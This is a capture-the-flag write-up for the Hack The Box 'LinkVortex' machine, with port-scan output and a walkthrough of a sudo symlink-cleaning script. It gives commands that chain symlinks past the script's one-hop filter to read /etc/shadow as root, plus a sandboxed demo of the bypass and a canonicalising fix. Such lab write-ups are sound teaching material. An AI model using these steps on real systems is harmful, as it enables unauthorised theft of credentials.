Hack. Eat. Sleep. Repeat!!!
❯ rustscan -a linkvortex.htb -- -Pn -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/sensei/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.47:22
Open 10.10.11.47:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 05:04 WAT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:04
Completed NSE at 05:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:04
Completed NSE at 05:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:04
Completed NSE at 05:04, 0.00s elapsed
Initiating Connect Scan at 05:04
Scanning linkvortex.htb (10.10.11.47) [2 ports]
Discovered open port 22/tcp on 10.10.11.47
Discovered open port 80/tcp on 10.10.11.47
Completed Connect Scan at 05:04, 0.21s elapsed (2 total ports)
Initiating Service scan at 05:04
Scanning 2 services on linkvortex.htb (10.10.11.47)
Completed Service scan at 05:04, 6.47s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.47.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:04
Completed NSE at 05:05, 7.10s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:05
Completed NSE at 05:05, 0.87s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:05
Completed NSE at 05:05, 0.00s elapsed
Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up, received user-set (0.22s latency).
Scanned at 2025-02-23 05:04:49 WAT for 15s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
| 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open http syn-ack Apache httpd
| http-methods:
|_ Supported Methods: POST GET HEAD OPTIONS
|_http-generator: Ghost 5.58
|_http-server-header: Apache
| http-robots.txt: 4 disallowed entries
|_/ghost/ /p/ /email/ /r/
|_http-favicon: Unknown favicon MD5: A9C6DBDCDC3AE568F4E0DAD92149A0E3
|_http-title: BitByBit Hardware
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I found a dev subdomain and dumped its .git directory with the GitHacker tool.

Arbitrary File Read

I discovered an exploit here. With it I read the file /etc/passwd and the Dockerfile, which might contain necessary credentials.

I ran sudo -l and spotted a rule that allows user bob to run a bash script as root:

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi
The script assigns /var/quarantined to the variable QUAR_DIR and checks whether the variable CHECK_CONTENT is set; if it is not set, it sets it to false. Then the variable LINK is set to the first argument. LINK must end with .png, which means the argument has to be named like a png file (the regex only looks at the name, not at the contents). Note that CHECK_CONTENT is later executed as a command (if $CHECK_CONTENT), so the value true works because it runs /usr/bin/true; since the script runs as root, whatever command name ends up in that variable runs as root.

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi
Next it runs sudo test -L on LINK to check whether the argument is a symbolic link. If it is, it sets the variable LINK_NAME to the basename (basename <filename>) and LINK_TARGET to the file the symbolic link points to, as returned by readlink. Lastly, it checks whether that target contains the string etc or root, to prevent attackers from reading critical files, and unlinks the symlink if it does. If that condition is not met, the else branch moves the link to /var/quarantined, and if the variable $CHECK_CONTENT is true, the file is read with cat.

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi
To get past the filter, first create a symlink to /etc/shadow in the home directory, under a name that contains neither etc nor root, and then create a .png symlink in /tmp that points at that first link instead of at /etc/shadow directly. readlink resolves only one level, so LINK_TARGET becomes /home/bob/tpassz.txt; the grep for (etc|root) does not match, and the script never reaches the unlink branch. You can see in the image that the .png link does not point to the original file, /etc/shadow, but the cat binary follows the whole chain and reads it anyway. CHECK_CONTENT must be created and set to true with export so that the content branch runs. This only reaches the root process because the sudo configuration lets CHECK_CONTENT through; with sudo's default env_reset the exported variable would be stripped and nothing would be printed.

cd ~; ln -s /etc/shadow /home/bob/tpassz.txt
cd /tmp; ln -s /home/bob/tpassz.txt /tmp/rootz.png
export CHECK_CONTENT=true
sudo -u root /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
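The two-hop bypass covered in the walkthrough of the script and in the exploit commands above, as an added example that is not the box's clean_symlink.sh and not the author's code: it rebuilds the chain inside a throwaway directory (constructed paths and a fake /etc/shadow line, nothing touches the real /etc), reproduces the one-hop readlink decision the script makes, and puts a canonicalising check based on readlink -f beside it. The function names setup_chain, onehop_allows, canonical_allows and quarantine_and_read are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not the clean_symlink.sh from the box: rebuilds the two-hop symlink
# chain in a temporary directory and shows why a one-hop readlink filter passes it
# while a canonicalising check (readlink -f) blocks it. All paths, file names and the
# /etc/shadow stand-in below are constructed for this demo.
set -u

# Lay out the sandbox: a fake /etc/shadow, the first hop in a "home" directory whose
# name contains neither "etc" nor "root", and the .png link the filter is handed.
setup_chain() {
  local box
  box=$(mktemp -d)
  mkdir -p "$box/etc" "$box/home/bob" "$box/tmp" "$box/quarantine"
  # constructed stand-in for a real shadow entry
  printf 'root:$6$constructed$notarealhash:19000:0:99999:7:::\n' > "$box/etc/shadow"
  ln -s "$box/etc/shadow" "$box/home/bob/tpassz.txt"      # hop 1: name reveals nothing
  ln -s "$box/home/bob/tpassz.txt" "$box/tmp/rootz.png"   # hop 2: what the script is given
  printf '%s' "$box"
}

# The decision the box's script makes: readlink resolves ONE level, then grep for etc|root.
# Returns 0 when the link would be let through to quarantine (and cat), 1 when removed.
# The sandbox prefix is stripped before matching so the random mktemp name cannot
# accidentally contain "etc" or "root"; the real script greps the absolute target.
onehop_allows() {
  local link=$1 target
  target=$(readlink "$link")
  ! printf '%s\n' "${target#"$SANDBOX"}" | grep -Eq '(etc|root)'
}

# Hardened decision: canonicalise the whole chain first, then apply the same grep.
canonical_allows() {
  local link=$1 target
  target=$(readlink -f "$link")
  ! printf '%s\n' "${target#"$SANDBOX"}" | grep -Eq '(etc|root)'
}

# What happens once the filter passes: the link itself (not its target) is moved to
# quarantine and cat follows the full chain from there. Absolute links survive the mv.
quarantine_and_read() {
  local link=$1 name
  name=$(basename "$link")
  mv "$link" "$SANDBOX/quarantine/"
  cat "$SANDBOX/quarantine/$name" 2>/dev/null
}

demo() {
  SANDBOX=$(setup_chain)
  local png="$SANDBOX/tmp/rootz.png"
  printf 'one-hop target  : %s\n' "$(readlink "$png")"
  printf 'canonical path  : %s\n' "$(readlink -f "$png")"
  if onehop_allows "$png"; then echo "one-hop filter  : allowed (bypassed)"; fi
  if canonical_allows "$png"; then echo "canonical check : allowed"; else echo "canonical check : blocked"; fi
  echo "content read through the chain:"
  quarantine_and_read "$png"
  rm -rf "$SANDBOX"
}

demo
```

Run it as an unprivileged user; it never leaves the temporary directory. The canonical check closes the multi-hop trick, but it is still a check-then-act sequence: a link target swapped between readlink -f and cat would not be caught, so a script of this shape should not be reachable through sudo at all.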